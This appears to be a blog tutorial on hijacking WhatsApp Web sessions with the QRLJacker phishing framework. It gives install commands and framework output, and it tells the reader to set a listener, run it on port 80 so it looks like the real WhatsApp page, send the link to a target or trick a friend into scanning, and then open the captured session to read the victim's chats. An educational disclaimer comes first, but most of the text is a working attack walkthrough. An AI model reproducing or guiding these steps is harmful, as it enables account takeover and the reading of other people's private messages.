NOTE:This tutorial is for educational purposes we are not responsible for any kind of misuse
Social Engineering attacks still works. Most of the attackers do use social engineering methods to trick targets. According to ethical hacking researcher of international institute of cyber security social engineering methods are used in QRLJacker, a tool that is used in obtaining whats app web sessions. The whole program is written in python. This tool works on principle of phishing. Phishing is a type of social engineering attack in which fake login pages or payment pages are generated to gather credentials of users.
QRLJacker is most common tool used in whatsapp session hijacking which can be helpful in initial phase of pentesting.For testing we have used Live Kali Linux 2019.4 amd64. While testing QrlJackersometimes, QRLJacker was not working on installed versions of Kali linux. We have tested onLive boot of Kali Linux 2018.4, 2018.3 & 2019.1 amd64.Geeko driver act as web browser engine used in applications developed by Mozilla. It creates an link between Selenium (an python module) & Mozilla browser. For installing type wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gzType tar -xvzf geckodriver-v0.24.0-linux64.tar.gz and change directory to extracted one.Type sudo mv -f geckodriver /usr/local/share/geckodriverType sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriverType sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriverRemember to update firefox browser. For that type sudo apt-get update & sudo apt-get install firefox-esrType apt-get install python3.7Type git clone https://github.com/OWASP/QRLJackingType python3.7 -m pip install -r requirements.txtType python3.7 QrlJacker.py
!\/ ! \/ ./
!/\ ! |\ ./
! \ ! / \ ./
! \______!______| \ ,/
! /\ ! ./\ ,/
! / \ ! | \ ,/
!/ \___!____| ,/ Everything is connected, even the simplest things!
! / \ _!__ *\,/
! ! \ ! \,/
! ! | \! ,/
! ! ,! /| QrlJacker-Framework By @D4Vinci - V2.1
! !/ / | Attack vector By Mohamed Abdelbasset Elnouby (@SymbianSyMoh)
! / \ / | Loaded 1 grabber(s), 0 post module(s).
!\./ \/ |
!/\ / |
! \ / .o.
! \/ :O:
! / "
QrlJacker > help
help/? Show this help menu.
os <command> Execute a system command without closing the framework
banner Display banner.
exit/quit Exit the framework.
database Prints the core version, check if framework is up-to-date and update if you are not up-to-date.
debug Drop into debug mode or disable it. (Making identifying problems easier)
dev Drop into development mode or disable it. (Reload modules every use)
verbose Drop into verbose mode or disable it. (Make framework displays more details)
reload/refresh Reload the modules database.
Type list & type use grabber/whatsapp
QrlJacker > list
grabber/whatsapp Whatsapp QR-sessions grabber and controller
QrlJacker > use grabber/whatsapp
Type options & type set port 1337Type set host 192.168.1.7
QrlJacker Module(grabber/whatsapp) > set port 1337
[+] port => 1337
QrlJacker Module(grabber/whatsapp) > set host 192.168.1.7
[+] host => 192.168.1.7
QrlJacker Module(grabber/whatsapp) > options
Name Current value Required Description
port 1337 Yes The local port to listen on.
host 192.168.1.7 Yes The local host to listen on.
useragent (default) Yes Make useragent is the (default) one, a (random) generated useragent or a specifed useragent
Type run, you can also run this on port 80 rather than 1337, to look it like a real page of whatsapp
QrlJacker Module(grabber/whatsapp) > run
QrlJacker Module(grabber/whatsapp) > run
[+] Using the default useragent
[+] Running a thread to keep the QR image [whatsapp]
[+] Waiting for sessions on whatsapp
[+] Running a thread to detect Idle once it happens then click the QR reload button [whatsapp]
[+] Initializing webserver… [whatsapp]
After starting Qrljacker server. You can send this link to your target. For testing we have opened generated QrlJacker Code on Windows 7. Type 192.168.1.7:1337 For usage we have opened on whatsapp 2.19.98. Scan the QR code in Whatsapp web of your mobile or ask your friend to login in whatsapp web using social engineering techniques
Go to terminal where you have started QrlJacker on Kali. Type sessions Sessions will shows connected Whats app accounts to QrlJacker sessions.
QrlJacker Module(grabber/whatsapp) > sessions
ID Module name Captured on
0 whatsapp Sat-Apr-13-04:53:03-2019
As you type sessions -i 0, Kali Linux web browser will open with target Whatsapp account First it will open web.whatsapp.com.
But after 1 or 2 seconds target Whatsapp account will open.
Now you can see all the chat of whatsapp.
Categories: TECH & SCIENCE